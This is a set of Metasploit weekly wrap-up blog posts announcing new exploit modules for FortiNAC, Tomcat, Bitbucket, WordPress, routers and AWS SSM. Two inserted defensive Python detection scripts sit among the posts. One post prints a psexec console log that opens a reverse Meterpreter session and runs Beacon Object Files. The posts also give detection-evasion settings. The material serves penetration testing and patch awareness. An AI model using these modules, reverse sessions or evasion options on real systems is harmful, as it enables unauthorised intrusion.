All posts by Grant Willcox

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2023/06/07/metasploit-weekly-wrap-up-13/

Cloud Fun With EC2


New ground was broken today with the addition of two PRs from community contributor sempervictus, also known as RageLtMan, who added the ability for Metasploit to establish sessions to EC2 instances using Amazon’s SSM interface, which provides a public API to execute commands or create real-time interactive websocket command shells. This can result in passwordless elevation of privilege in most if not all cases.

This module is also very helpful as it provides pentesters with the tools required to show the impact of having SSM exposed and can help reinforce the importance of data governance, locality, isolation, and auditing. It can also show how user-based access control systems may be bypassed by the privileges users within IAM have using the SSM interface as an elevation of privilege pivot. Finally, it can also be used to demonstrate how attackers can exfiltrate data from systems which do not have network access outside of the cloud environment.
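The post's point from the defensive side is that SSM is a fully logged, IAM-gated path to command execution: every `StartSession` and `SendCommand` call lands in CloudTrail under `eventSource` `ssm.amazonaws.com`. The script below is an added example (not part of Metasploit or the contributor's PRs) that filters a batch of CloudTrail records for those two execution events and reports any whose calling principal is not on an allow-list. The records, account ID, instance ID, ARNs and addresses are constructed for the example; the allow-list and the `ssm_exec_findings` / `targets_of` helpers are this example's own.

```python
"""Flag SSM-driven command execution in CloudTrail records (added example)."""
import json
from typing import Dict, Iterable, List, Set

# SSM API calls that run code on an instance: an interactive websocket shell
# (StartSession) or a one-shot document run (SendCommand).
EXEC_EVENTS = {"StartSession", "SendCommand"}

# Constructed sample CloudTrail records. Field names follow the CloudTrail
# record format; account IDs, instance IDs, ARNs and IP addresses are made up.
SAMPLE_RECORDS: List[Dict] = [
    {
        "eventTime": "2023-06-07T10:00:00Z",
        "eventSource": "ssm.amazonaws.com",
        "eventName": "StartSession",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111111111111:user/dev-alice"},
        "sourceIPAddress": "203.0.113.10",
        "requestParameters": {"target": "i-0123456789abcdef0"},
    },
    {
        "eventTime": "2023-06-07T10:05:00Z",
        "eventSource": "ssm.amazonaws.com",
        "eventName": "SendCommand",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::111111111111:assumed-role/OpsAutomation/bob"},
        "sourceIPAddress": "198.51.100.7",
        "requestParameters": {"documentName": "AWS-RunShellScript",
                              "instanceIds": ["i-0123456789abcdef0"]},
    },
    {
        "eventTime": "2023-06-07T10:06:00Z",
        "eventSource": "ssm.amazonaws.com",
        "eventName": "SendCommand",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::111111111111:assumed-role/PatchManager/aws-ssm"},
        "sourceIPAddress": "ssm.amazonaws.com",
        "requestParameters": {"documentName": "AWS-RunPatchBaseline",
                              "targets": [{"key": "tag:Patch", "values": ["true"]}]},
    },
    {
        "eventTime": "2023-06-07T10:07:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "DescribeInstances",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111111111111:user/dev-alice"},
        "sourceIPAddress": "203.0.113.10",
        "requestParameters": {},
    },
]

# Principals that are expected to drive SSM (constructed for the example):
# here only the patching automation role.
APPROVED_PRINCIPALS: Set[str] = {
    "arn:aws:sts::111111111111:assumed-role/PatchManager/aws-ssm",
}


def targets_of(record: Dict) -> List[str]:
    """Collect the instance IDs or tag selectors an SSM call was aimed at."""
    params = record.get("requestParameters") or {}
    targets: List[str] = []
    if params.get("target"):                      # StartSession: single instance
        targets.append(params["target"])
    targets.extend(params.get("instanceIds") or [])  # SendCommand: explicit list
    for selector in params.get("targets") or []:     # SendCommand: tag/resource selectors
        key = selector.get("key", "")
        targets.extend(f"{key}={value}" for value in selector.get("values") or [])
    return targets


def ssm_exec_findings(records: Iterable[Dict], approved: Set[str]) -> List[Dict]:
    """Return every SSM execution event whose caller is not on the allow-list."""
    findings = []
    for record in records:
        if record.get("eventSource") != "ssm.amazonaws.com":
            continue
        if record.get("eventName") not in EXEC_EVENTS:
            continue
        principal = (record.get("userIdentity") or {}).get("arn", "<unknown>")
        if principal in approved:
            continue
        params = record.get("requestParameters") or {}
        findings.append({
            "time": record.get("eventTime"),
            "event": record["eventName"],
            "principal": principal,
            "source_ip": record.get("sourceIPAddress"),
            "document": params.get("documentName"),
            "targets": targets_of(record),
        })
    return findings


if __name__ == "__main__":
    for finding in ssm_exec_findings(SAMPLE_RECORDS, APPROVED_PRINCIPALS):
        print(json.dumps(finding))
```

In practice the records come from a CloudTrail Lake query or the S3 trail bucket rather than an inline list; the allow-list is the useful part, because on most accounts legitimate SSM use is limited to a handful of automation roles, and a human IAM user opening a session to an instance is exactly the "passwordless elevation" the post describes.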

Contacts Are Like Cookies – I Need More

Community contributors Nolan LOSSIGNOL-DRILLIEN and Vladimir TOUTAIN added a module for exploiting a preauthentication contact database dump vulnerability in Dolibarr 16 prior to 16.0.5. Contact details are a great help for attackers as they can allow them to craft more believable phishing attacks and gain more information about the internal structure of a target company. They can also give information on a company’s relationships with other companies which could reveal information about sensitive company dealings.

Router Exploits – They Never Stop

Router exploits are like fine wine. They just don’t stop, and these devices are often left unpatched for years on end, which can lead to issues where they are compromised and used in attacks such as in the case of the Mirai botnet. Community contributors Anna Graterol, Mana Mostaani, and Nick Cottrell added a new module targeting CVE-2015-3035, which uses a directory traversal vulnerability in unpatched TP-LINK Archer C7 routers to dump arbitrary files from the target, such as the /etc/passwd file.

New module content (7)

Amazon Web Services EC2 instance enumeration

Author: RageLtMan
Type: Auxiliary
Pull request: #17430 contributed by sempervictus

Description: This adds the ability for Metasploit to establish sessions to EC2 instances using Amazon’s SSM interface. The result is an interactive shell that does not require the user to transfer a payload to the EC2 instance. For Windows targets, the shell is a PTY-enabled PowerShell session that is incompatible with Post modules but supports user interaction.

VSFTPD 2.3.2 Denial of Service

Authors: Anna Graterol, Maksymilian Arciemowicz, Mana Mostaani, and Nick Cottrell (Rad10Logic)
Type: Auxiliary
Pull request: #18004 contributed by rad10
AttackerKB reference: CVE-2011-0762

Description: This PR adds an auxiliary module for DoSing a VSFTPD server from version 2.3.2 and below.

Apache NiFi Login Scanner

Author: h00die
Type: Auxiliary
Pull request: #18028 contributed by h00die

Description: A new scanner module has been added to scan for valid logins for Apache NiFi servers.

Apache NiFi Version Scanner

Author: h00die
Type: Auxiliary
Pull request: #18025 contributed by h00die

Description: This PR adds a version scanner for Apache NiFi.

Archer C7 Directory Traversal Vulnerability

Authors: Anna Graterol, Mana Mostaani, and Nick Cottrell
Type: Auxiliary
Pull request: #18003 contributed by rad10
AttackerKB reference: CVE-2015-3035

Description: This adds a module that gathers a specific file by leveraging a directory traversal vulnerability in TP-LINK Archer C7 routers. This vulnerability is identified as CVE-2015-3035.

Dolibarr 16 pre-auth contact database dump

Authors: Nolan LOSSIGNOL-DRILLIEN and Vladimir TOUTAIN
Type: Auxiliary
Pull request: #17899 contributed by vtoutain

Description: This adds a module that leverages an authorization bypass in Dolibarr version 16, prior to 16.0.5. This module dumps the contact database to retrieve customer files, prospects, suppliers, and employee information. No authentication is needed for this exploit.

AWS SSM Sessions

Author: sempervictus
Type: Payload
Pull request: #17430 contributed by sempervictus

Description: This adds the ability for Metasploit to establish sessions to EC2 instances using Amazon’s SSM interface. The result is an interactive shell that does not require the user to transfer a payload to the EC2 instance. For Windows targets, the shell is a PTY enabled PowerShell session that is incompatible with Post modules but supports user interaction.

Enhancements and features (2)

  • #18021 from zeroSteiner – The PowerShell Post API methods use a mix of PowerShell and .NET methods which have different ways of keeping track of the current working directory. This change fixes the ambiguity by synchronizing the current working directory referenced by each set of methods.
  • #18031 from wvu – Updates the edit and log commands to explain how to set LocalEditor and LocalPager so that users can adjust the editor that is used when running the edit command and the log file that is used for logging module runtime information, respectively.

Bugs fixed (6)

  • #18019 from cgranleese-r7 – Fixes validation for the to_handler command when running Evasion and Payload modules.
  • #18026 from adfoster-r7 – A bug has been fixed in test modules whereby not all modules were manipulating the load path to require the module_test library correctly, resulting in them being dependent on other modules correctly setting the load path, which may not always occur.
  • #18030 from wvu – A missing return statement was added into lib/msf/core/exploit/cmd_stager/http.rb to fix a Ruby syntax error when attempting to handle a 404 file not found case.
  • #18032 from wvu – A bug has been fixed in the cmd/brace encoder whereby it did not appropriately escape braces.
  • #18036 from adfoster-r7 – A typo has been fixed in the ibm_sametime_enumerate_users.rb gather module that prevented exceptions that were raised from being appropriately caught.
  • #18052 from adfoster-r7 – The test/modules/post/test/file.rb module previously did not work on Windows sessions due to it reading data from a Linux only file to determine what data to write for the binary file write operation. This has since been fixed so that the binary data is randomly generated vs being based off an OS specific file.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2023/03/17/metasploit-weekly-wrap-up-196-2/

FortiNAC EITW Content Added


Whilst we did have a few cool new modules added this week, one particularly interesting one was a Fortinet FortiNAC vulnerability, CVE-2022-39952, that was added by team member Jack Heysel. This module exploits an unauthenticated RCE in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7 to gain root level access to affected devices. This bug has seen active exploitation in the wild, as reported by several threat feeds such as ShadowServer at https://twitter.com/Shadowserver/status/1628140029322362880, so definitely patch if you haven’t done so already.

Tomcat Gives Me All The Shells

One other exploit we did want to call out this week was a local privilege escalation on Apache Tomcat prior to 7.0.54-8. Tomcat is widely deployed in a lot of environments, and this PR, exploiting CVE-2016-5425, allows you to escalate from an authenticated user to full root control over a web server by exploiting a file permissions issue. These vulnerabilities can be quite beneficial to attackers looking to gain further access to a network as often they will compromise a web server and then use that web server to start pivoting deeper into the network. Gaining root access to a web server can further assist them with these efforts. It’s also rather unusual to see a web server specifically being used to assist with local privilege escalation as most exploits tend to focus on using them to gain initial access, so we appreciate the efforts from h00die to add this into Metasploit.

New module content (3)

Fortinet FortiNAC keyUpload.jsp arbitrary file write

Authors: Gwendal Guégniaud, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #17750 contributed by jheysel-r7
AttackerKB reference: CVE-2022-39952

Description: A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC’s keyUpload.jsp page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the root user, giving full control over the target device.

Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation

Authors: Dawid Golunski and h00die
Type: Exploit
Pull request: #17509 contributed by h00die
AttackerKB reference: CVE-2016-5425

Description: This PR adds an exploit that targets a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8, allowing attackers to inject commands into the systemd-tmpfiles service to write a cron job that will execute their payload. Successful exploitation should result in privilege escalation to the root user.

Bitbucket Environment Variable RCE

Authors: Ry0taK, Shelby Pace, and y4er
Type: Exploit
Pull request: #17775 contributed by space-r7
AttackerKB reference: CVE-2022-43781

Description: This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing the Bitbucket application into generating a diff. This module requires at least admin credentials. Successful exploitation results in RCE as the atlbitbucket user.

Enhancements and features (1)

  • #17757 from adfoster-r7 – Updates the formatting logic for the info command to improve the readability of the module description. Previously the module description was squashed into a single line, but now each paragraph, bullet list, etc. will be rendered on its own new lines.

Bugs fixed (1)

  • #17774 from adfoster-r7 – A bug has been fixed when displaying the Metasploit banner due to use of an undefined function; this has been updated to use the proper function.

Documentation added (1)

You can always find more documentation on our docsite at docs.metasploit.com.


Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/10/07/metasploit-weekly-wrap-up-179/

Bofloader – Windows Meterpreter Gets Beacon Object File Loader Support


This week brings a new and frequently requested feature to the Windows Meterpreter, the Beacon Object File loader. This new extension, bofloader, allows for users to execute Beacon Object Files as written for either Cobalt Strike or Sliver. This extension was provided by a group effort among community members kev169, GuhnooPlusLinux, R0wdyJoe, and skylerknecht.

Documentation is available on the new docs site which walks through using the new extension. Since the bofloader is a full-fledged extension, it can be used without loading stdapi which has been noted as an important setting (set AutoLoadStdapi false) for avoiding detection.

Once a Meterpreter session is loaded along with the bofloader extension, the execute_bof command becomes available. The user needs to specify a path to their BOF file and any necessary arguments.

msf6 exploit(windows/smb/psexec) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf6 exploit(windows/smb/psexec) > exploit


[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:62900) at 2022-10-07 12:10:21 -0400


meterpreter > load bofloader
Loading extension bofloader...

meterpreter                  
   ▄▄▄▄    ▒█████    █████▒  
  ▓█████▄ ▒██▒  ██▒▓██   ▒   
  ▒██▒ ▄██▒██░  ██▒▒████ ░   
  ▒██░█▀  ▒██   ██░░▓█▒  ░   
  ░▓█  ▀█▓░ ████▓▒░░▒█░      
  ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░      
  ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
   ░    ░ ░ ░ ░ ▒   ░ ░      
   ░          ░ ░  loader    
        ░                    


Success.
meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/whoami/whoami.x64.o
[*] No arguments specified, executing bof with no arguments.


UserName		SID
====================== ====================================
MSFLAB\DC$	S-1-5-18




GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  Enabled by default, Enabled group, Group owner, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\System Mandatory Level            Label                    S-1-16-16384                                  Mandatory group, Enabled by default, Enabled group, 




Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled                      
...             


meterpreter > 

If MinGW is available, BOF files can be compiled from source code using the --compile flag.

meterpreter > execute_bof ../../OutputStreams.c --compile
[*] No arguments specified, executing bof with no arguments.
[CALLBACK_OUTPUT]: message
[CALLBACK_ERROR]:  message

meterpreter > 

Finally, BOF files which require arguments can be called if the user knows their format. This information would typically come from either reading the BOF file’s source code or documentation. In the following example, the nslookup BOF takes two UTF-8 strings, followed by one int16. The format string details can be found in the documentation along with a table for quick reference in the --help output.

meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/nslookup/nslookup.x64.o --format-string zzs metasploit.com 192.168.250.4 1
A metasploit.com 18.67.65.57
A metasploit.com 18.67.65.86
A metasploit.com 18.67.65.104
A metasploit.com 18.67.65.65
NS com f.gtld-servers.net
NS com a.gtld-servers.net
...

meterpreter >

WordPress Elementor RCE – CVE-2022-1329

This week community contributors AkuCyberSec, Ramuel Gall, and h00die landed a nice module for CVE-2022-1329, an authenticated vulnerability in the Elementor Website Builder Plugin for WordPress that allows unauthorized execution of several AJAX actions.

Any authenticated user can exploit this vulnerability to upload a PHP file onto the website. The module takes advantage of this vulnerability to request that the Elementor plugin try to install Elementor Pro from a user supplied zip file, which is something any user with Subscriber permissions or higher can do. Once the PHP file is uploaded to the target website, the attacker can then browse to the page hosting their PHP file to get RCE as the www-data user.

Ubuntu Enlightenment Mount Priv Esc – CVE-2022-37706

It’s been a while since we last had a Linux LPE in the framework for Ubuntu, but thanks to some work from community contributors Maher Azzouzi and h00die, we have an exploit for CVE-2022-37706. This takes advantage of a bug within one of Linux’s window managers, called Enlightenment, and occurs due to a command injection vulnerability in Enlightenment’s enlightenment_sys binary. Versions prior to Enlightenment 0.25.4 are vulnerable and can be exploited by authenticated users who have a userland shell to gain arbitrary code execution as the root user.

Remote Mouse Server RCE – Unpatched

Community contributors 0RPHON, H4rk3nz0, and h00die brought us a nice vulnerability this week for an unauthenticated RCE via the Emote Interactive protocol, aka CVE-2022-3365. According to 0RPHON, the original bug discoverer, the bug occurs because authentication for the Emote Interactive protocol never seems to be enforced. Attackers can utilize this vulnerability to gain unauthenticated RCE as the user running Remote Mouse Server. Note that whilst a CVE is assigned, the bug is still unpatched at the time of writing.

New module content (6)

Enhancements and features (3)

Bugs fixed (3)

  • #17072 from smashery – This PR fixes a regression discovered when session interaction hangs because a file slated for cleanup is in use, so the framework side times out, but the shell side does not. The fix also includes more robust handling for shell tokens in all types of shells.
  • #17078 from cgranleese-r7 – This PR updates the deprecated report_auth_info method calls in the modules/auxiliary/scanner/rservices/ modules to now make use of create_credential instead.
  • #17091 from bcoles – Fixes module metadata for stability and reliability for several modules.


Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/15/metasploit-weekly-wrap-up-166/

JBOSS EAP/AS – More Deserializations? Indeed!


Community contributor Heyder Andrade added in a new module for a Java deserialization vulnerability in JBOSS EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior. As far as we can tell this was first disclosed by Joao Matos in his paper at AlligatorCon. Later a PoC from Marcio Almeida came out that Heyder Andrade used as the basis for his Metasploit module. The exploit allows an unauthenticated attacker with network access to JBOSS EAP/AS <= 6.1.0 Remoting Unified Invoker interface to gain RCE as the user jboss by sending a crafted serialized object to this interface.

Deserialization attacks have certainly been quite popular as of late but we haven’t seen many in JBOSS lately so we appreciate the efforts of these contributors to provide us with some alternative deserialization attacks 🙂

More Unauthenticated RCEs – Sourcegraph gitserver sshCommand RCE

One unauthenticated RCE is nice for a weekly wrapup, but we can always do better. Why not make it two this week? Courtesy of Spencer McIntyre and Altelus1’s PoC, we now have a Metasploit module for CVE-2022-23642, an unauthenticated RCE in Sourcegraph Gitserver prior to 3.37.0 that allows attackers to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. Successful exploitation will allow an unauthenticated attacker to execute commands in the context of the Sourcegraph Gitserver server.

This is another cool attack, as we don’t often see these types of configuration-related issues leading to unauthenticated RCE; typically when they do crop up, there are limitations on what one can do. However in this case we ended up with a full RCE as an unauthenticated user, which goes to show that even less common or more frequently overlooked issues under the right scenario can be exploited to gain privileged access.

Decrypting Ya Secrets – Citrix Netscaler Secrets Decrypter

Finally, community contributor npm-cesium137-io added a new module to decrypt Citrix Netscaler appliance configuration files and recover secrets encrypted with the KEK encryption scheme, provided you have the key fragment files.

We have heard both from npm-cesium137-io and others that Citrix Netscaler has been seen on a number of pen testing engagements so hopefully this module should assist those pen testing these environments by allowing them to more easily obtain secrets during their engagements.

New module content (3)

Enhancements and features (2)

  • #16735 from ErikWynter – This change sets the MeterpreterTryToFork advanced payload option to true by default for the Linux target in the aerohive_netconfig_lfi_log_poison_rce module to prevent the application from hanging once exploited.
  • #16764 from bcoles – Adds two new HTTP client evasion options to msfconsole HTTP::shuffle_get_params, and HTTP::shuffle_post_params that allow users to randomize the order of the POST and GET parameters to evade static signatures.

Bugs fixed (5)

  • #16617 from NikitaKovaljov – This fixes a race condition that was present in the ipv6_neighbor module that caused hosts to be missed when the scanned range was very short due to an adaptive timeout with an insufficient floor value.
  • #16703 from e2002e – This fixes compatibility issues with the Censys V2 API and the censys_search.rb module.
  • #16718 from cdelafuente-r7 – This fixes the run_as library and module to work correctly on 64-bit systems.
  • #16727 from bcoles – Modules that use the tftp command stager fail due to a missing tftphost option. This ensures that the tftphost host is set and valid before proceeding with creating the command stager.
  • #16736 from ErikWynter – This change fixes a bug in the confluence_widget_connector exploit module to prevent it from crashing when the HTTP response body received in the get_java_property method is empty or does not match expected regex.


Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/07/01/metasploit-weekly-wrap-up-164/

SAMR Auxiliary Module


A new SAMR auxiliary module has been added that allows users to add, lookup, and delete computer accounts from an AD domain. This should be useful for pentesters on engagements who need to create an AD account to gain an initial foothold into the domain for lateral movement attacks, or who need to use this functionality as an attack primitive.

Note when using this module that there is a limit on the number of computer accounts a standard user can add, so be wary that you may get STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED error messages if you try to run this repeatedly. It should also be noted that whilst a standard user can create a computer account, you will need additional privileges to delete that account.
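The quota the post mentions is the domain's ms-DS-MachineAccountQuota attribute, and the directory keeps a record of who used it: when a user without explicit create-child rights adds a computer account under the quota, Active Directory stores that user's SID in the new object's mS-DS-CreatorSID attribute, whereas accounts created by administrators carry no creator SID. The script below is an added example (not Metasploit code) that audits a snapshot of computer objects for accounts created this way and reports which creators have exhausted the quota. The snapshot, SIDs and account names are constructed; the default quota value of 10 is the Active Directory default; the helper names are this example's own.

```python
"""Audit computer accounts created through the machine account quota (added example)."""
from collections import Counter
from typing import Dict, Iterable, List

# Default value of ms-DS-MachineAccountQuota on a freshly created domain.
DEFAULT_MACHINE_ACCOUNT_QUOTA = 10

# Constructed directory snapshot, shaped like the result of an LDAP search for
# (objectClass=computer) returning sAMAccountName, mS-DS-CreatorSID and
# whenCreated. The domain SID, RIDs and host names are made up.
_DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_COMPUTERS: List[Dict] = [
    # Joined by an administrator: no creator SID is recorded.
    {"sAMAccountName": "WS01$", "mS-DS-CreatorSID": None, "whenCreated": "2021-03-01T09:12:00Z"},
    {"sAMAccountName": "FILESRV$", "mS-DS-CreatorSID": None, "whenCreated": "2021-03-01T09:14:00Z"},
    # One ordinary user (RID 1105) joined a single laptop: normal helpdesk-style use.
    {"sAMAccountName": "LAPTOP-JD$", "mS-DS-CreatorSID": f"{_DOMAIN}-1105",
     "whenCreated": "2022-01-10T15:00:00Z"},
]
# Another ordinary user (RID 2301) burned the whole quota within a few minutes,
# which is the pattern repeated runs of an account-creation tool would leave.
SAMPLE_COMPUTERS += [
    {"sAMAccountName": f"DESKTOP-{n:02d}$", "mS-DS-CreatorSID": f"{_DOMAIN}-2301",
     "whenCreated": f"2022-06-30T14:{n:02d}:00Z"}
    for n in range(10)
]


def quota_created(computers: Iterable[Dict]) -> List[Dict]:
    """Computers whose mS-DS-CreatorSID is set, i.e. created by a non-admin via the quota."""
    return [c for c in computers if c.get("mS-DS-CreatorSID")]


def computers_per_creator(computers: Iterable[Dict]) -> Counter:
    """Number of quota-created computer accounts attributed to each creator SID."""
    return Counter(c["mS-DS-CreatorSID"] for c in quota_created(computers))


def creators_at_quota(computers: Iterable[Dict],
                      quota: int = DEFAULT_MACHINE_ACCOUNT_QUOTA) -> List[str]:
    """Creator SIDs that have used the whole quota; their next attempt would fail with
    STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED."""
    counts = computers_per_creator(computers)
    return sorted(sid for sid, n in counts.items() if n >= quota)


def report(computers: Iterable[Dict], quota: int = DEFAULT_MACHINE_ACCOUNT_QUOTA) -> str:
    """Human-readable summary: every creator, their count, and the accounts involved."""
    computers = list(computers)
    lines = [f"quota-created computer accounts: {len(quota_created(computers))} "
             f"of {len(computers)} (quota={quota})"]
    for sid, n in computers_per_creator(computers).most_common():
        names = sorted(c["sAMAccountName"] for c in quota_created(computers)
                       if c["mS-DS-CreatorSID"] == sid)
        flag = "  <-- quota exhausted" if n >= quota else ""
        lines.append(f"  {sid}: {n} account(s){flag}: {', '.join(names)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_COMPUTERS))
```

On a real domain the snapshot comes from an LDAP query against a domain controller; the useful follow-ups are to set ms-DS-MachineAccountQuota to 0 and delegate joins explicitly, and to alert on any new computer object that arrives with mS-DS-CreatorSID populated.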

A Pesky Table Bug Gets Squashed

A well known bug in Rex-Tables when trying to render tables which contain unsupported characters has now been fixed in Rex-Text 0.2.38, which has now been pulled into the framework. This should solve a number of issues that have been reported over the last year such as https://github.com/rapid7/metasploit-framework/issues/15833, https://github.com/rapid7/metasploit-framework/issues/14955, and https://github.com/rapid7/metasploit-framework/issues/15044. It should also help improve experiences with some of the new LDAP work we have been working on lately, so that users should have a smoother experience once that releases.

PHP Mailer Argument Injection Module Improvements

As a final point of note, community contributor erikbomb has improved the PHP Mailer Argument Injection exploit targeting CVE-2016-10033 and CVE-2016-10045 to now support changing the name of the fields for the name, email, and message objects. This should allow this exploit to work under additional scenarios where these settings may need to be altered for the exploit to successfully run. Much thanks to erikbomb for these enhancements!

New module content (1)

  • SAMR Computer Management by JaGoTu and Spencer McIntyre – This adds an auxiliary module that can be used to add, lookup, and delete computer accounts from an Active Directory domain. The computer account can offer a sort of foothold into the domain for lateral movements or as a common attack primitive.

Enhancements and features (1)

  • #16721 from erikbomb – This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

Bugs fixed (2)

  • #16722 from bcoles – Fixes module metadata for stability and reliability.
  • #16729 from gwillcox-r7 – Fixes a crash in Metasploit’s console when trying to render tables which contain unsupported characters.


Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/06/17/metasploit-weekly-wrap-up-162/

vCenter Secret Extracter


Expanding on the work of the vcenter_forge_saml_token auxiliary module, community contributor npm-cesium137-io has added a new module for extracting the vmdir/vmafd certificates, the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated, from an offline copy of the services database. This information can then be used with the vcenter_forge_saml_token module to gain a session cookie that grants access to the SSO domain as a vSphere administrator.

Great work by npm-cesium137-io to complete this exploit chain and provide users a full end to end solution to get administrative level privileges on a vCenter/vSphere server given an offline copy of the services database!

Named Pipe Pivoting Documentation Updates

Historically speaking named pipe pivoting has been an area of much confusion among users. We have taken note of this and thanks to some help from adfoster-r7 and bwatters-r7, we have added in some documentation for using named pipe pivoting with Windows Meterpreter.

You can find this documentation online on our documentation site at https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html. Note that since Metasploit 6.2, our documentation lives inside of the Metasploit codebase, which you can find at docs/metasploit-framework.wiki/Pivoting-In-Metasploit.md.

Service Library Improvements

Community contributor kalidor noticed whilst testing a few modules that the Windows Services library we maintain was in need of some updates and was erroring out for him in a number of cases. This turned out to be due to some inappropriately thrown exceptions. After further consultation it was decided that a rewrite of the code was needed, which not only solved the original issue but also brought the Windows Services library into closer alignment with existing design patterns, ensuring it will be easier to maintain long term.

New module content (1)

  • VMware vCenter Extract Secrets from vmdir / vmafd DB File by npm – This module extracts the vmdir / vmafd certificates from an offline copy of the service database (i.e. a vCenter backup). Right now it will pull the IdP keypair, the VMCA root cert, and anything from vmafd that has a private key associated.

Enhancements and features (1)

  • #16654 from adfoster-r7 – This PR adds documentation for using named pipe pivoting with Windows Meterpreter.

Bugs fixed (3)

  • #16602 from kalidor – If a user restarted a service using lib/msf/core/post/windows/services.rb an exception would be thrown as an integer instead of as a string, which would cause an error to occur. This has been fixed by rewriting the code for service_restart to use more appropriate logic. Additionally, the documentation has been updated for lib/msf/core/post/windows/services.rb to note which functions may throw exceptions.
  • #16627 from bwatters-r7 – The tools/modules/update_payload_cached_sizes.rb script has been updated to contain additional exception handling to appropriately handle any exceptions that may be thrown during runs, and then print out a list of those exceptions at the end of the run.
  • #16665 from adfoster-r7 – A missing import has been fixed in /tools/exploit/random_compile_c.rb, allowing it to now compile C files as expected.


Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/02/04/metasploit-wrap-up-147/

WordPress Exploitation Returns


What’s life without a little WordPress exploitation? Courtesy of Hacker5preme (aka Ron Jost) and h00die, we now have an exploit for CVE-2021-24862, a bug in the RestorationMagic WordPress plugin prior to 5.0.1.6 whereby user input was not properly escaped in the rm_chronos_ajax action prior to it being used in an SQL statement.

By utilizing this module, authenticated attackers can grab the usernames and password hashes of users on the affected WordPress site, which could then be cracked using hashcat or John The Ripper to get the plaintext password.

Since users are prone to reusing their passwords across sites, this module could potentially allow attackers who successfully cracked a user's password to log into other sites as well, a practice commonly known as credential stuffing. As a reminder, it is recommended to use unique passwords for each site to mitigate against credential stuffing attacks.

Whilst the risk of this is somewhat mitigated by the fact that valid login credentials are required, keep in mind that RestorationMagic is a user registration form plugin designed to help register users onto your WordPress site, so in most cases all an attacker would have to do is register a user account on the target site to exploit this bug.

Unauthenticated Cisco Small Business RV Series Command Injection – Cisco Spiciness Returns

It's always good when we get a Cisco module, as these devices are used all over the place. Takeshi Shiomitsu and Rapid7's Jacob Baines certainly delivered on this front with a module for exploiting CVE-2021-1473, which combines an authentication bypass with a command injection vulnerability to execute code as the www-data user on vulnerable Cisco RV Series VPN routers running firmware versions 1.0.03.20 and below.

Because of the sensitivity of the data that Cisco routers process, as well as the level of access they often have, Cisco routers have often been a prime target for exploitation in the past. It is likely that in-the-wild exploitation of this vulnerability will occur in the near future, so if you haven't patched this vulnerability already, it is highly encouraged to do so soon.

New module content (3)

Enhancements and features

  • #15994 from timwr – This updates Metasploit’s RPC functionality to support reading the result of external commands which have been executed in a console.
  • #16014 from sjanusz-r7 – This adds human readable long-form option names to various commands such as save/connect/search and more.
